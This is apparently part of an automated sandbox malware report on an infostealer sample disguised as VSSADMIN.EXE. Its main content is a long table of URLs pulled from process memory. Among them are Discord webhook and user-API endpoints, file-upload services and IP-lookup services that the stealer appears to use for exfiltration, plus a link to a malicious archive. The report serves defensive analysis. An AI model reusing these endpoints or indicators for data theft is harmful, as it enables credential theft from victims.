              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/urllib3/urllib3/issues/2680 | VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://tools.ietf.org/html/rfc2388#section-4.4 | VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | VSSADMIN.EXE.exe, 00000001.00000003.192490005.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192251935.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190636870.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191866250.0000014C6CC6F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192002784.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191661797.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190589554.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191646152.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://api.anonfiles.com/upload | VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://blank-2MD3E.in | VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://discord.com/api/v9/users/ | VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://cacerts.digi | VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://peps.python.org/pep-0205/ | VSSADMIN.EXE.exe, 00000001.00000003.191782438.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191891921.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191706435.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244706685.0000014C6CAB0000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190653423.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190620855.0000014C6CBDB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192012033.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/urllib3/urllib3/issues/3020 | VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.200799345.0000019600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB92EA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://cdn.discordapp.com/attachments/1125126396101021879/1152337129716842596/Blank-user.rar | VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D540000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C608000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://www.microsoftDOWNLO~1JSOy.0 | VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
              http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://go.micro | powershell.exe, 00000008.00000002.200799345.000001960159C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196013E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.0000019601682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196015CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB94965000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://contoso.com/Icon | powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://httpbin.org/ | VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html | VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://crl.comodoca.p | VSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/Pester/Pester | powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g | VSSADMIN.EXE.exe, 00000001.00000003.244230392.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0BD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535 | VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CBB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244259837.0000014C6CFED000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244863597.0000014C6CFEE000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com/favicon.ico | VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://crl.globalT | VSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.python.org/psf/license/ | VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD40388000.00000040.00000001.01000000.00000004.sdmp | false | | high
              http://ip-api.com/line/?fields=hostingr | VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://crl.micro | powershell.exe, 00000025.00000002.224011476.000001FBAB187000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://api.anonfiles.com/uploadr | VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://tools.ietf.org/html/rfc6125#section-6.4.3 | VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D5F4000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://go.microsoft.c | powershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://google.com/mail | VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://go.microsoft.ctain | powershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm | VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://foss.heptapod.net/pypy/pypy/-/issues/3539 | VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900. | VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://google.com/ | VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://api.gofile.io/getServerr | VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://ocsp.sectigo.com0 | VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.python.org/download/releases/2.3/mro/. | VSSADMIN.EXE.exe, 00000001.00000003.189820148.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C580000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6CA10000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189806826.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189789642.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmp | false |
                                                                                                          high
                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNVSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://contoso.com/Licensepowershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://discordapp.com/api/v9/users/VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://search.yahoo.com?fr=crmas_sfpfVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://ip-api.com/json/?fields=225545rVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/urllib3/urllib3/issues/2920VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://media.discordapp.net/attachments/1125126396101021879/1152337129716842596/Blank-user.rarVSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://yahoo.com/VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6VSSADMIN.EXE.exe, 00000001.00000003.192742374.0000014C6D005000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245103939.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D29E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192750598.0000014C6D280000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D250000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://html.spec.whatwg.org/multipage/VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244323782.0000014C6D256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsVSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D51C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://contoso.com/powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://www.iana.org/time-zones/repository/tz-link.htmlVSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7vVSSADMIN.EXE.exe, 00000001.00000002.245142886.0000014C6D3F0000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://api.gofile.io/getServerVSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngVSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D24A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://sectigo.com/CPS0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://ocsp.thawte.com0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://json.orgVSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://twitter.com/VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://dotnet.micrVSSADMIN.EXE.exe, 00000001.00000003.244243794.0000014C6D092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://google.com/VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://google.com/mail/VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://ac.ecosia.org/autocomplete?q=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://search.yahoo.com?fr=crmas_sfpVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://bugs.python.org/issue42195.VSSADMIN.EXE.exe, 00000001.00000003.192780632.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192563442.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920PVSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://google.com/mail/VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CCC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/Blank-c/Blank-GrabberVSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.openssl.org/HVSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245994756.00007FFD43FB3000.00000004.00000001.01000000.00000010.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);VSSADMIN.EXE.exe, 00000001.00000003.190605654.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.microsoftESSAG~1.JSOy.0VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                low
                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://peps.python.org/pep-0263/VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                    high
IP               Domain       Country        ASN    ASN Name         Malicious
208.95.112.1     ip-api.com   United States  53334  TUT-ASUS         false
162.159.138.232  discord.com  United States  13335  CLOUDFLARENETUS  true
                                                                                                                                                                    IP
                                                                                                                                                                    192.168.2.1
Joe Sandbox Version: 38.0.0 Beryl
Analysis ID: 1309234
Start date and time: 2023-09-15 22:15:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 96
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: VSSADMIN.EXE.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@126/90@8/3
EGA Information:
• Successful, ratio: 60%
HDC Information: Failed
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 133
• Number of non-executed functions: 213
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 142.251.32.67, 204.79.197.200, 13.107.21.200
